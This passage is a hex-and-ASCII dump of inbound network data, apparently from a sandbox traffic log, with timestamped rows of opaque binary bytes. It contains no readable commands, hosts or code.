2023-10-13 13:21:13 UTC	3560	IN	Data Raw: 69 f8 68 e7 15 fe 6a 38 d9 27 91 e1 28 09 9f 77 ee 6b 46 67 ed 6a 7e 15 b0 f4 48 9e c3 b6 c1 d7 78 ff f9 b6 1d c4 01 03 32 93 3f fc ab 8d e6 c6 22 ab 2f ec d5 12 37 d4 5b c6 a7 6d 9e 66 8a c5 4e 6d 79 a7 e3 5d bb 3d aa 51 e2 e9 b7 63 5f 0b 96 a0 2e 27 56 d8 09 61 5b dc 66 82 3c 0f b2 f7 b1 44 3a 32 86 28 9a 77 65 8c b9 e5 63 d6 aa a7 c3 4a c8 43 1e 2a 71 aa 6a 51 cd 56 8b c0 8e 7e 06 7f 76 1a c4 8d 6d e0 01 a9 4f d3 56 21 f4 90 f9 ef ae 1b 1e 8c 7a 75 58 99 46 0d bc e3 6a 35 44 7d ba d8 4f 63 64 f5 ad 41 7e db 49 07 1b b8 52 03 4b cf 72 d8 3b e9 2c 13 f6 43 c0 76 34 a8 5b c0 4e 6a e8 44 43 11 26 0b d6 f3 3e e2 4a d1 f9 52 70 39 a1 92 51 08 35 ea 14 f8 8e 2d 80 70 40 13 64 57 d5 9a 5a 38 62 76 3e 59 0f d7 70 bc 80 60 e0 1d 1b 62 e5 a9 f4 11 83 ee 31 27 ff Data Ascii: ihj8'(wkFgj~Hx2?"/7[mfNmy]=Qc_.'Va[f<D:2(wecJC*qjQV~vmOV!zuXFj5D}OcdA~IRKr;,Cv4[NjDC&>JRp9Q5-p@dWZ8bv>Yp`b1'
2023-10-13 13:21:13 UTC	3576	IN	Data Raw: fc a5 b0 63 0d 60 46 2d 70 cf c5 9d af cc f6 71 97 29 16 cf 83 f1 c7 2c 5c 44 06 a7 6e 63 68 cd 24 be 5d 2c fc 2e 0e d8 41 c8 83 5e 99 bc 36 9d 1d a1 11 84 0e bd 1a d9 56 7f 34 8c 9c 99 91 68 a0 8b 75 c1 af cf a2 9f 0c fe 74 00 ce d0 51 22 fe c2 b8 78 ea f6 7e 9f 8b 9e cc 7a 43 e0 7d 0b 2e d6 ac c8 52 13 0b 8a 36 21 77 9c 4c 1e 97 4d d1 b7 49 cb 25 c2 98 c1 80 ba 0e d4 76 af 22 f6 93 fb 8b a4 01 93 f0 d7 e2 66 99 c6 48 cc 1f e8 50 eb e2 e8 8e 5c ed b3 0d 3f 75 d9 47 09 c9 8f 7f 11 83 5f 1a 65 01 51 cc 57 31 34 24 1d 5a d4 52 a9 39 45 51 25 c1 93 7b 89 63 d9 61 6d e4 84 86 b2 48 76 78 71 e4 4a 87 fc 3f 34 c1 b1 f1 5a cf 82 2f 15 80 2f 9a 52 b7 f8 23 79 e0 3b 34 64 86 59 0e c7 31 d9 c1 42 c2 cc 76 45 1a 33 1c de 4f 26 7f 43 67 fc df 64 6a 50 cd ad 84 e2 25 Data Ascii: c`F-pq),\Dnch$],.A^6V4hutQ"x~zC}.R6!wLMI%v"fHP\?uG_eQW14$ZR9EQ%{camHvxqJ?4Z//R#y;4dY1BvE3O&CgdjP%
2023-10-13 13:21:13 UTC	3592	IN	Data Raw: af 52 75 e0 1c c2 5a 05 23 ed 1d 7c 9e 59 0d 54 0f 56 14 d6 a3 28 b5 30 66 31 c3 3d 59 5f 9a a5 a2 a8 4e d2 05 a9 e3 f7 cc a9 55 f2 90 f3 02 9d c0 13 2d 60 3c b2 f8 dc b0 92 43 be 96 2d 8f fd 92 7d 9b 56 94 af 46 75 e7 34 b9 e5 1e 26 d2 82 f7 f7 78 7f 03 55 fe 9b ce d8 f0 43 28 a4 65 2e 24 a6 0c d6 4f 0e b5 84 da ce a4 52 bc 38 d2 25 69 91 b1 bd 96 1a 10 31 16 97 c4 24 76 52 38 04 1c cf 68 b2 be 9e e6 3d a5 46 fe 2b 0f 88 ca 4a 4d 55 c0 12 91 76 bb 11 91 0e 11 b5 68 48 b7 e3 7b 77 a1 f5 aa cf c9 46 ec 12 28 69 a2 5f 71 8f e6 99 ce cf db 42 dc a8 79 57 da bf 9c 96 72 b9 c0 f5 88 85 6a 6f 69 de 66 0f c5 5c 2c 57 13 00 1e be a5 7e 12 9f e4 bb 00 3e 82 13 8e 31 72 60 a1 33 16 2a f1 a2 65 c8 61 e3 f9 da a4 ad 0c fc 53 15 cc e3 08 b6 42 95 e1 c6 8d 03 ba a7 df Data Ascii: RuZ#\|YTV(0f1=Y_NU-`<C-}VFu4&xUC(e.$OR8%i1$vR8h=F+JMUvhH{wF(i_qByWrjoif\,W~>1r`3*eaSB
2023-10-13 13:21:13 UTC	3608	IN	Data Raw: 96 c8 45 77 59 fd 1f ab 98 f9 89 3d 03 3b d1 d1 4b 30 c2 2a bc ae 56 96 cc f3 57 f5 7d 98 1a 02 98 67 8a db 63 99 f6 88 3e 29 34 75 05 18 e7 6c 53 91 c5 d7 62 06 a7 5a f0 c3 7b 17 a1 75 53 de fd 0c f2 c6 4d 05 37 3c e3 77 80 3f dd 41 0c 6d 7b 31 32 73 53 90 3d 48 e5 91 db 14 8d 39 29 3b 9b c9 3c f1 c0 77 bd 37 e5 40 6f 7c 41 27 8e 72 5f b6 4b 0d 45 36 af c5 fd 13 9d 2d 98 f2 98 df 60 95 92 22 9f ef 24 22 b5 d9 2c 0f ab 51 f1 dc 61 df e6 39 0e 77 69 72 2a 3e a1 db 7f 35 90 6a 1f e2 52 55 6c d7 0a 23 c2 0a 3e 9b 9c 09 d7 35 94 46 e6 ed 76 5e 8e 8e 16 e2 63 e8 5d b0 92 5d 6a 28 8d f2 ee fd 07 4a 81 6f f0 e2 24 d4 a1 1d 6b d5 16 e3 86 89 c5 16 6a c6 42 c1 ef 59 c0 f9 5f 25 ef 92 aa 02 b7 48 08 4e 61 e4 a8 a8 85 2e 62 e9 59 2d f8 69 3c 72 bc e4 8d be ee 5c a8 Data Ascii: EwY=;K0VW}gc>)4ulSbZ{uSM7<w?Am{12sS=H9);<w7@o\|A'r_KE6-`"$",Qa9wir>5jRUl#>5Fv^c]]j(Jo$kjBY_%HNa.bY-i<r\
2023-10-13 13:21:13 UTC	3624	IN	Data Raw: ce da 98 d2 3f e6 e4 28 9c 49 09 df 98 46 df 0e d3 74 5d 1b f7 56 ad 61 08 b3 86 28 f4 fc 84 b2 9b 16 15 cd 62 0e 45 76 fd 56 da 1a 6f 08 26 fe bf fa a9 f4 3a ac f3 83 01 c2 2d 9e 89 80 33 ce ed 9e 59 d9 8c 5a c8 70 65 33 01 63 21 80 a4 41 c5 b7 22 44 45 a8 49 90 92 8c b0 5e 30 25 f2 4d 89 c5 60 50 98 14 da 76 d2 43 f4 5f 6f 87 8f a7 a2 cd 23 fb d4 5a 63 fc 8d 9f d6 ee 51 38 d5 50 0f 08 9f 14 4d 87 9d b7 fa 33 d1 f6 33 a4 58 34 62 b9 1f a6 15 eb d7 2c be c2 56 1e 82 8a 74 a6 4c be cb 19 a9 e5 bc 82 f9 e4 83 9d e5 29 e3 00 fa 4c 58 f9 25 1c 5b c5 80 ca ef 9f 39 5f 70 9e 6b 92 82 f4 b6 7a e5 de 3a d0 5a 45 2e 20 30 5f 77 ff 1f a1 3b 78 3a 3f 63 5a db 76 8a 58 35 6f 90 df 5a 0d 68 e1 7c 06 d7 7d 70 2d 6b b4 ca 05 14 f8 7d 60 93 58 d7 93 de 57 77 00 20 65 3f Data Ascii: ?(IFt]Va(bEvVo&:-3YZpe3c!A"DEI^0%M`PvC_o#ZcQ8PM33X4b,VtL)LX%[9_pkz:ZE. 0_w;x:?cZvX5oZh\|}p-k}`XWw e?
2023-10-13 13:21:13 UTC	3640	IN	Data Raw: 5b b2 61 1c 13 a1 ee 4a 5c dd 32 37 29 d2 8a 8f 6b 08 f7 71 34 a2 d2 23 42 5b 64 3d 3d 37 fd 57 e6 5f f1 37 bc 6a d9 9c 02 e1 5f 4a d8 68 5f 53 b6 c7 d0 bb 0f 1f 66 ec 3c 3f 01 a2 f7 c5 e6 48 3f 9d 44 53 29 20 7a 99 b8 df 2c 01 a7 42 5f 5f 41 e7 d8 51 4b 46 a4 cb 08 b9 98 4f 88 4e f1 d1 36 c9 1f a1 8d 19 18 f7 fc 5f 0c 3a e8 57 77 e2 0e d3 33 e6 b7 5a 10 d9 1e 6c c0 a6 94 30 9e 49 df fc 5e 1d ac ce 4c 54 70 a5 ee a1 ee 79 54 49 6c 9e 6c 40 83 77 aa 9b 35 58 9b 52 11 39 7c b5 ab c5 87 b7 45 6b 1e b3 61 c8 20 10 df 2b da e3 9c 04 9c 70 91 f9 d4 78 27 85 f2 2f 40 f5 61 5c df 39 35 f0 18 49 1c 55 e2 49 e1 7c a8 0e 51 2c 4f a9 b6 dd b7 f7 eb b8 52 05 1a 00 97 e7 04 5e 0a 46 28 12 6c 9e 47 32 02 c1 54 e8 f2 42 de 13 2a d4 01 9b a3 25 77 85 cd e0 b1 a3 0a 72 cd Data Ascii: [aJ\27)kq4#B[d==7W_7j_Jh_Sf<?H?DS) z,B__AQKFON6_:Ww3Zl0I^LTpyTIll@w5XR9\|Eka +px'/@a\95IUI\|Q,OR^F(lG2TB*%wr
2023-10-13 13:21:13 UTC	3656	IN	Data Raw: c2 0c f6 8d 58 34 80 dd cf 1b 23 0d 1d 43 9f 35 ad 53 59 c7 5b c5 fc ff 51 51 53 e2 c6 81 4a 23 8b 71 c7 c0 03 fa 9a c8 df 97 2e ff 47 46 e6 9b 99 bc 34 e5 89 a7 12 e0 ab 59 04 3e d3 26 fc cd d9 11 9c 1c c7 18 2b 08 f6 f5 b6 0f bf dc a1 a4 5d 57 15 0c b1 8c ad 5d cc 25 11 2d 06 ca fb 16 81 45 2f bb f4 76 47 f4 37 0d 15 2a c4 ac f3 f9 6b 16 57 bd f6 a3 5c cb 81 5f d1 c1 e5 91 d1 f1 3e 7f 6d 46 85 5d 72 24 50 d6 b2 e2 6e cb cb e8 79 fb 00 8c 3e 65 d6 d1 e3 ee 6f 8c c5 16 a2 c5 9d 22 6b 23 25 38 c3 84 90 42 4b 50 c3 ec f7 96 b8 e0 56 a7 dc 8d 9c 62 c5 70 2a ae f8 14 06 53 d1 f2 93 aa ba 91 5c 77 d8 2a ad 01 79 b3 00 8e c6 a0 81 7f d5 70 6a 33 61 ce 7c a9 62 1a 41 ef aa e4 f8 f6 2d fd 42 46 3f 90 42 05 ad a2 bf d7 0d 29 c1 84 7f f7 34 bd 33 b6 f7 4e 1f ac 3f Data Ascii: X4#C5SY[QQSJ#q.GF4Y>&+]W]%-E/vG7kW\_>mF]r$Pny>eo"k#%8BKPVbpS\w*ypj3a\|bA-BF?B)43N?
2023-10-13 13:21:13 UTC	3672	IN	Data Raw: 77 4b a1 63 23 72 f4 49 11 5d 8e 33 f5 33 e0 71 cf 3a 97 63 00 a7 32 36 48 ea 13 c3 e9 a3 30 77 25 c1 46 6f a6 22 ce e4 28 ba e1 75 de c6 f4 93 0a 0f da 94 60 9a eb ad 1e 7e 75 03 c8 9c 75 ee b0 d1 b2 70 58 49 92 94 2a a3 57 c0 14 40 59 39 8b 24 3a d6 6e ae 04 91 f3 25 84 46 ca 5a 48 ea c1 63 00 80 8d d1 8f 3d 83 b0 22 55 eb 99 b3 ec f0 fc 77 9f 12 70 e3 1c e6 26 1c 22 c0 65 61 e2 12 a7 97 00 7f ac 47 60 3e 60 67 2f a4 65 7b 03 ff 48 42 85 e5 f3 30 57 c8 6e 78 d9 c5 27 01 cf 5c 4b f1 e2 88 e8 a5 fd df be b5 5b 24 75 a1 2e 73 e6 bc e1 a4 13 14 9d b4 d9 6a 24 03 94 43 86 ce 5e 3f 12 17 1c b9 d8 bb e6 0d 5a fa 21 e2 8c a4 f0 af 88 1f 17 b3 31 3f 71 2e 01 7b 44 51 a7 1e 56 80 a2 60 00 16 ae 6e 83 7d e5 37 71 4b 38 20 63 86 d5 58 56 bc 46 aa 9a fa a1 f8 e7 97 Data Ascii: wKc#rI]33q:c26H0w%Fo"(u`~uupXI*W@Y9$:n%FZHc="Uwp&"eaG`>`g/e{HB0Wnx'\K[$u.sj$C^?Z!1?q.{DQV`n}7qK8 cXVF
2023-10-13 13:21:13 UTC	3688	IN	Data Raw: 17 91 b5 af de 49 34 84 25 dc 58 bb be cc 42 ac 19 3e 9a 14 1e 81 01 e3 37 ac d1 0d 00 34 a9 db 46 17 77 b5 00 18 10 72 b8 d9 af 59 32 e1 c3 da b0 25 e5 b1 42 cf cc 84 86 91 01 1b 00 cd 6c b9 1b 7d 96 7a b7 2d 84 eb 63 27 5b 23 42 9b de 81 4a 57 8b 46 05 22 a1 6a 7b d0 5d fb 27 1e 4c d2 71 55 ec c7 26 bd b0 c0 98 e0 7b 93 86 09 dd 58 40 f6 cb 0e fd 2c 55 d4 47 17 0a 78 df b9 44 d3 23 d1 a3 d2 5d c1 ee 95 4e 8f 5e ed 05 06 79 1f 2b 57 36 ea b9 7c 47 1c ac 9b df 3a c2 bc 34 9f 0a a6 5f 8a 9b fb da 97 72 b3 19 9c 6d 1d d9 70 cb fd b0 2e 2c 47 72 c9 d4 30 27 76 6e a6 90 2c 45 0b fc d8 1a 68 b0 9f cb 01 5e a2 76 21 56 57 20 35 74 b0 e4 ab 97 3f a5 27 81 4e 5f ef ae 77 0d 0c 7b d2 1e 9f 61 40 60 61 71 fd 5e 42 f1 dd 8d f0 5b 26 e9 87 94 2e 37 40 0f f9 f5 69 28 Data Ascii: I4%XB>74FwrY2%Bl}z-c'[#BJWF"j{]'LqU&{X@,UGxD#]N^y+W6\|G:4_rmp.,Gr0'vn,Eh^v!VW 5t?'N_w{a@`aq^B[&.7@i(
2023-10-13 13:21:13 UTC	3704	IN	Data Raw: 93 a2 c4 02 e3 f3 7d 02 56 dd a3 d1 f7 08 8d 1f 51 60 93 3c e4 a9 eb e9 6b 6c ee ff 0e 4a f7 b3 e7 82 e8 97 26 a1 e7 09 3e 34 6d 3b a0 7b fa 17 e8 0f 94 2a c3 0f e3 f7 4f bd 82 94 77 ae b4 42 65 7f 70 35 f0 a9 df 2a f2 58 3d 70 5a 08 e0 3c 4b 10 cb 0f 33 6c bc de d9 3d f1 b7 65 a7 80 38 fd 54 b0 fa 41 b3 df 58 b0 8d b1 55 a6 79 50 48 f7 c4 52 49 88 da 48 ea cb 1f 32 79 36 a6 8f ed a2 c7 9b 26 2a 38 18 7c 69 aa f9 40 d3 a7 17 1f 76 b8 a8 36 f9 47 fc 42 8d a3 a5 fa eb c8 97 c5 01 a2 18 88 40 f8 25 4f b4 f9 d7 78 ad 88 a3 5a 05 b6 8d 57 f1 00 14 54 42 09 f9 65 e9 38 03 d9 01 85 ee 41 fb 15 10 66 23 e6 0e 6c 35 c0 52 91 ea 72 0a 79 93 9a c3 6d 5c a7 08 c3 56 4d ac d2 de 29 d3 d5 b7 a8 a0 37 0e cd 0b 66 79 69 80 e4 76 62 66 54 33 7e a9 9c 76 5c a8 f5 e8 a1 5b Data Ascii: }VQ`<klJ&>4m;{OwBep5X=pZ<K3l=e8TAXUyPHRIH2y6&*8\|i@v6GB@%OxZWTBe8Af#l5Rrym\VM)7fyivbfT3~v\[
2023-10-13 13:21:13 UTC	3720	IN	Data Raw: 7b 5f db f7 88 82 b8 e6 e8 23 94 3a 0a 90 bd 4e 4a 22 9b f3 ac c0 6f 2f 3d 8b 5d 84 91 fc 50 e9 47 20 a2 cf b0 1b 60 b9 01 b4 bc fa 6b 02 c6 cd ce ab a1 62 ac 1d b8 7f 7b 51 33 4e c8 0f 69 a8 4b 87 89 2a bc b6 0f ae cc 56 52 4c 7c a5 e0 dc 1e 5b f3 55 32 7b 42 16 63 ce 00 04 13 27 41 b3 f0 6c 5d a1 05 0e 6a 00 94 63 26 8b 97 42 ec 5a a9 85 ff b2 06 03 71 88 6c b8 b8 20 6f 47 42 e1 5b 1d 2b e0 05 98 7b 21 3a 5b 91 17 1c 39 3b 9d 88 2a b5 8f df 9a 0a 0d 37 65 6f e1 71 62 d7 9a f9 a8 39 e6 a4 24 c8 da c3 db 2b ef d3 bb 3a ad 0d 4a 29 05 1c 7e ac 6d a6 ac 4c 77 0b fd a2 ea 6d 58 7a ab 0a 64 cb ab c8 96 6e ed 3e 99 86 42 bf 7b 5a fd d3 f8 d3 40 f7 e1 b3 7e 31 c9 08 d2 4a ba 47 bf d1 b8 41 72 f6 0a 80 a6 1e bb 91 d3 b0 2c 40 46 55 59 61 83 7a 7a 95 75 a2 96 87 Data Ascii: {_#:NJ"o/=]PG `kb{Q3NiKVRL\|[U2{Bc'Al]jc&BZql oGB[+{!:[9;7eoqb9$+:J)~mLwmXzdn>B{Z@~1JGAr,@FUYazzu
2023-10-13 13:21:13 UTC	3736	IN	Data Raw: 66 08 96 d3 8d 96 71 ee a4 8d 89 cb 6a ec a6 19 8b 09 49 be bf b6 14 81 b8 5f 7d 45 f5 a2 7f 87 3d 74 49 ed df 4f 67 5f 2e 47 ca 1d 36 f7 8e 1d 0b e4 a8 47 fd 96 7c 70 3f c8 c3 77 53 53 87 e9 b6 26 b9 c8 66 b4 0a 49 79 6b 18 e9 71 fe 72 a2 00 86 57 c4 3a 0b c2 3b c9 fd ef 41 40 64 a4 3a 47 ef 02 f0 98 4c d3 ed 7b b9 4d 6f 34 9a 02 f7 a2 66 67 b3 3e 9d 57 b1 26 6d e0 34 79 d1 95 5c b5 eb af 34 d6 c6 c1 52 d1 b3 f6 ef 49 24 be bd f1 1e 5e 73 f0 5e 45 ae 0c 84 d9 66 82 32 ad c8 94 4b 6d 63 4f 81 5c da 77 15 bb da e8 a8 f5 e5 c7 ec a9 ef b8 30 39 0c c8 1c ad 4a b5 5d 70 4c 79 e8 5a 1a 53 44 52 dc 6f 54 4a 43 53 13 a3 67 61 ee 2b d8 b0 9b a9 91 85 77 e9 be 20 1e 3a 0b d2 08 af ec cf a2 4f 89 2f 4f 85 09 a9 b6 ee 92 ac 05 bd f9 bf 68 51 e8 0c d5 2e 84 5e 1e c4 Data Ascii: fqjI_}E=tIOg_.G6G\|p?wSS&fIykqrW:;A@d:GL{Mo4fg>W&m4y\4RI$^s^Ef2KmcO\w09J]pLyZSDRoTJCSga+w :O/OhQ.^
2023-10-13 13:21:13 UTC	3752	IN	Data Raw: d5 fd b4 b8 e6 0c e5 8c 77 69 50 5b 1b a7 3c c7 92 6f 29 59 2d 0a 41 98 3f d3 af 0d 2f 2d bb ec 8e b6 d3 fd 4d b8 ac 64 27 d8 64 51 b9 d2 0d a6 43 b9 3c b7 45 dd 2c 36 53 57 c6 f4 2b 33 e6 b2 39 68 d4 17 64 03 b0 8e f3 2f 94 69 a6 31 2a 68 0c a1 89 28 9b b7 b3 3b fd cf cb 0a b4 7d 71 4b c5 c3 09 71 92 d3 72 2a 5e c5 be 15 06 de 9b eb 9e 5c 91 d5 ac b6 1d 91 13 94 72 77 a1 65 8e 3b d5 60 ca 0b 41 cc 64 25 c5 9e 4a a4 fe 9a 30 3e 30 77 ac 6c 1b e8 e4 eb ae aa 5a 14 34 5f 3d b3 6b cc 9f 02 02 67 2b 7a 26 aa b5 6d 3f a6 a4 6a 7e 5e a3 36 be 2c 16 f2 b6 81 0b 84 62 a9 ff e6 9a d7 0a 4f 56 03 6f 68 c4 4f ef 62 b8 05 f9 ad ca 61 4c 2e b1 23 55 48 e8 6e fe 34 07 70 47 3c 89 ad dc 81 a5 df 83 80 e8 01 ef 85 ef 25 ba 37 67 e6 7c ce fc c0 0f d1 9c 96 61 0f 40 af b1 Data Ascii: wiP[<o)Y-A?/-Md'dQC<E,6SW+39hd/i1h(;}qKqr^\rwe;`Ad%J0>0wlZ4_=kg+z&m?j~^6,bOVohObaL.#UHn4pG<%7g\|a@
2023-10-13 13:21:13 UTC	3768	IN	Data Raw: 57 7e 76 43 0f c9 1d 83 a6 ff 77 30 a5 8c 2e b3 72 9a 26 b6 83 10 fa fb 88 eb 80 2a 44 92 dc 27 6d 6a 54 3d 7b 5d 0d c1 a7 3b 8a bf cf f8 8d 97 b3 bb 25 f1 84 bf e6 ef 6d 14 1a 39 20 24 6e 2b db 17 ce 8e 5b 0c c4 90 ba 1e bc 2c c5 9e 44 b2 60 a9 3c 35 37 13 e7 c6 5d cb 0d 8d 8c d7 d0 68 5a 43 a9 0b 36 df e4 57 c3 e7 c9 41 44 b9 a6 64 fd 80 63 c8 e1 f7 70 84 a8 64 7e 7e 8a 6a eb 42 5e 07 8a a1 f1 78 8d f5 26 89 2f 19 ea 3a 5a 18 de ac 9c 57 a5 cc d1 3a 2e bc 4a 04 be 69 4f 35 56 f8 ec 21 db 02 bd 05 0d d9 79 3c 08 51 37 e9 06 67 c1 9e b8 e8 a9 ad cf f7 09 71 2c d5 1f da 3f 94 10 ed 63 13 30 4b 99 84 31 89 64 f0 8d 51 e3 55 bf 50 46 d8 8d 8a ce 63 2a 04 cc ae ae 21 c0 4f f1 2a ef 64 81 45 1c d8 8e cc 75 6c f1 19 6b c4 cd 9c 11 77 62 13 60 69 4a 85 0c b1 63 Data Ascii: W~vCw0.r&D'mjT={];%m9 $n+[,D`<57]hZC6WADdcpd~~jB^x&/:ZW:.JiO5V!y<Q7gq,?c0K1dQUPFc!O*dEulkwb`iJc
2023-10-13 13:21:13 UTC	3784	IN	Data Raw: 82 53 26 9f ec 79 07 85 9e 4f 28 de 50 05 c3 71 ae d4 53 8a b6 9f 6c 27 f2 e1 f9 3e a5 e6 50 13 b2 a0 21 a9 be 75 0c b2 2b d4 6f 34 65 4f ff 74 43 dc fe 77 a6 e9 4b 33 24 0e e4 0f d2 db 1d ee fb b6 0c 85 00 3b 5d d9 a1 07 76 69 08 d9 ac 49 0f ca f5 66 55 9a 12 d0 47 e5 71 71 90 ca 60 45 42 74 83 53 bb fc 1f 61 6e 72 09 f3 c3 0a af 5c 49 49 76 90 57 e5 b5 b4 52 0e da 2a 03 a8 60 a9 04 6b 75 06 60 cb b8 10 bc fa b6 3f a0 de 0b 7b 3e f9 d4 7a 29 35 e9 f5 b8 a6 e6 51 99 16 6d 77 ae 88 14 13 70 0d 4d 81 92 7b 71 44 2e 44 63 c3 9a 34 62 5f 85 b7 77 bc 70 65 7c 48 30 8b 80 e8 4f a1 0f c8 15 c2 12 cf cc 18 2d 58 9e 07 57 b6 60 f9 0d 71 5a a7 02 e7 0a 72 4b 6a 3f 96 ee b2 e3 d9 80 64 b1 31 02 ef 2f 6b f0 24 56 e1 dc 3b 0d d2 e4 33 89 27 af 14 19 a4 2d 65 72 f4 b3 Data Ascii: S&yO(PqSl'>P!u+o4eOtCwK3$;]viIfUGqq`EBtSanr\IIvWR*`ku`?{>z)5QmwpM{qD.Dc4b_wpe\|H0O-XW`qZrKj?d1/k$V;3'-er
2023-10-13 13:21:13 UTC	3800	IN	Data Raw: e5 1d 0d 55 2f 93 d0 43 f8 83 fe cb 23 23 40 8a 00 f3 df f3 1c 90 ae 90 7f c6 6c e7 d0 45 fa e9 a0 8a 31 f2 22 fc 9e e4 c6 de 26 ca 52 6d 11 89 bc 6d 12 9c c3 36 8f d5 0d 84 cf 0f 34 dd 06 b6 92 40 23 25 ee b1 34 91 27 0f 89 53 65 aa 0d 36 1b a0 38 8f b6 17 16 f9 1f 8c 3e de 69 57 46 5d 83 df fd 7f dc e3 f5 5c 78 0c c7 de 17 73 28 53 b3 4d 8a 11 25 a2 43 cc 14 42 99 d9 f1 a3 bd 3a 36 af 6a 0d 3b e0 41 34 a4 9d db 57 5a ff e6 30 1d ee c2 b5 f4 6e 4c fa 0a dd 17 11 fd 9a 78 80 cd 8c 09 ac b1 bd c1 e7 09 6b 73 3e 6d 0b a8 6c a1 ee 3b 06 9a 43 41 eb 3c 33 05 b6 00 9f 91 de 22 64 f4 d8 54 86 f2 4e 7c a9 48 7a 2b bd 45 44 dd 01 b8 ed 33 c4 03 d7 c9 f1 fa 4d ae 4f 4c 5c aa d8 c6 45 cc 7b b7 87 61 83 d0 49 2b 1d 3a 7c 5a bb 84 e5 71 b9 b9 07 4f 8e da 1b f1 44 1b Data Ascii: U/C##@lE1"&Rmm64@#%4'Se68>iWF]\xs(SM%CB:6j;A4WZ0nLxks>ml;CA<3"dTN\|Hz+ED3MOL\E{aI+:\|ZqOD
2023-10-13 13:21:13 UTC	3816	IN	Data Raw: 2c 01 e6 01 a3 04 14 36 09 da c6 f2 f3 17 42 12 d0 75 34 c4 bc 20 19 a3 eb a4 a7 af a3 61 d2 cb 79 f4 39 dc de 30 c9 4e 5b 87 a4 b4 d9 a1 14 e3 d1 df 8e 8f f7 78 2c b0 39 ce ba 1e 1f a6 05 ff f3 c5 9e 35 a5 31 e7 aa 65 ad f8 bf 95 5f 5c 5b d3 a8 29 6f 90 db 53 77 a3 2c 6f b5 6f 52 4e 6b 42 a4 6f a4 0d 31 b8 43 bf 4e 47 38 c5 d9 f1 d4 b5 b1 29 57 bc a1 e5 69 86 0e 8b d6 8c 64 63 2a 5e dd 1d 9c 95 f6 0e 4b c5 ec 99 77 cc d4 8e b4 5b 8e cd 3b eb 0f 5e 85 59 c7 f8 f9 e8 4e e2 6d 96 de d8 e6 d4 cf 46 95 85 93 f4 99 80 21 7c 01 ab 23 46 64 44 7a d5 2e cd 80 a2 ef 4d 4f 07 ba c3 2c 37 7e d5 34 08 a5 b8 a4 eb 4e b2 55 c7 fd a3 89 c9 c9 8e 6a 9d c0 6a 9d 68 2b 84 26 b2 e7 ec 86 16 7d b6 a1 50 ab 00 fc 5f e5 9a 63 cc f5 e8 5f 0c 08 d9 7b 12 e4 b8 9c 94 29 38 07 04 Data Ascii: ,6Bu4 ay90N[x,951e_\[)oSw,ooRNkBo1CNG8)Widc*^Kw[;^YNmF!\|#FdDz.MO,7~4NUjjh+&}P_c_{)8
2023-10-13 13:21:13 UTC	3832	IN	Data Raw: 97 cf 2a 2e 94 6c 76 dd 1c 01 19 58 5e a5 8b a1 64 79 70 47 2d af 80 20 5f d7 bf 34 49 cb 1b c7 d1 3c 1e 2f f3 71 0d 10 bc 74 40 29 a5 8c 24 ab 2e ea 33 c4 47 f5 e9 d1 4e c9 ec f5 84 3d 65 e1 59 2e 61 fc c6 3e 39 37 c7 c5 c5 29 12 d1 de d8 2c 8a 12 25 c1 44 0a 82 a9 ea c9 35 53 c7 c1 b7 0d c6 53 f2 3f 1d 3b 0b 91 94 94 c1 a5 cb 77 b5 e7 c6 5f ae db d7 d9 8c 9f 16 64 cd 51 f1 5f 56 a7 68 b5 8d b7 6a fe 98 ee 46 f7 93 28 30 45 ec d3 3f 77 a2 6e 88 4c 98 a8 be 3d 2e a1 e0 d3 58 02 a2 16 96 72 a4 af 57 fc f8 30 87 f3 d0 0c 09 d5 cb 32 ed 72 89 eb 29 43 34 a8 37 32 09 a5 68 22 d2 94 6a fc 48 47 d4 37 d3 fa 12 6c 5f 65 c6 9c ca 96 8a ac 49 b0 2f ae 70 bf f5 97 14 e9 74 19 d1 dc cd 4f 75 df 2d 5a d4 7f 48 f2 08 8b 24 82 37 df 38 4f 97 d9 98 61 d8 2b fa 93 08 50 Data Ascii: *.lvX^dypG- _4I</qt@)$.3GN=eY.a>97),%D5SS?;w_dQ_VhjF(0E?wnL=.XrW02r)C472h"jHG7l_eI/ptOu-ZH$78Oa+P
2023-10-13 13:21:13 UTC	3848	IN	Data Raw: f9 66 d0 61 3a 1f c1 8f e7 42 3d 5e 89 79 0e ca 85 c3 63 54 98 6e 34 18 33 01 6b d4 6a aa 34 de ca a0 8a 82 50 13 d9 58 e1 e4 d7 e7 d3 c9 7a 75 33 25 48 ae 51 6c c1 4e 9d 76 96 e5 4d d3 c0 53 34 06 bd 53 88 fd e4 9f 29 08 81 56 c2 e0 5e 14 aa e5 5c a7 14 cf 9a ab dd c0 28 b7 de bb 9a 0e bc 54 a0 d0 dc 8d e4 44 a8 2d 2e df 1d fa 21 0c ee e3 98 54 d6 5f ae 0a 25 1f ce ed 6f 11 c6 10 cd 50 a0 a9 74 f1 dc 60 e2 ce 41 7a 78 e0 c9 f0 ed 57 ad 99 20 92 34 96 ed d0 17 73 3b 59 0d e8 22 45 d6 ff 20 74 c9 dd 25 9f b8 b5 3f 9a 42 f9 cf a9 89 39 48 10 d6 68 99 ee 35 f3 99 f5 d3 2c 29 4a ae c0 41 4d c5 cb 60 5e 10 81 dc a8 8e 74 45 31 ad 6b 46 45 e7 21 da 25 03 66 b2 77 17 64 6e f8 a0 05 9e 56 9d 34 56 88 28 1f 0a f9 cf 1e 9f ba 47 46 db 71 a7 72 1c 09 04 67 07 91 1e Data Ascii: fa:B=^ycTn43kj4PXzu3%HQlNvMS4S)V^\(TD-.!T_%oPt`AzxW 4s;Y"E t%?B9Hh5,)JAM`^tE1kFE!%fwdnV4V(GFqrg
2023-10-13 13:21:13 UTC	3864	IN	Data Raw: b4 29 87 ab 16 3c 56 4e 11 a3 02 83 b4 8c f9 54 2d 6f cb ec c1 b2 79 d1 3c 89 7e fc 6d cf bc ea d5 9f 7c c0 52 71 63 86 55 86 d3 f7 f4 e6 d5 6f da 39 49 7e 11 b9 84 50 a1 15 9e 77 28 20 7b 0c 0c 66 67 18 8d 88 10 3c 12 bd df 53 65 cd f6 a8 f7 fe ec 1c 86 cb 8e 69 c6 47 fb 6f 4f f7 bf 21 75 db f0 92 f2 e6 0e ef 6c 56 41 2a 5b 3c df 14 fc 46 15 6f cc 44 d6 da 11 a2 33 37 19 1c 40 51 c9 ed b1 14 b7 96 ef 27 46 ec 91 10 61 e1 ed a4 73 78 73 e1 8f b1 49 f7 2c 0d 08 24 e7 20 27 dd fe a0 c7 f8 f1 d0 67 1f ce 47 8c 36 de d7 38 2a be 9b 1a f5 9f 47 81 38 19 ca c6 13 f4 9a 1b f8 6b 9b 58 ba 84 d8 87 e1 43 54 93 4a 06 c1 ce ce f6 90 89 28 a1 09 2a 0b 1f cf 90 40 33 ae b4 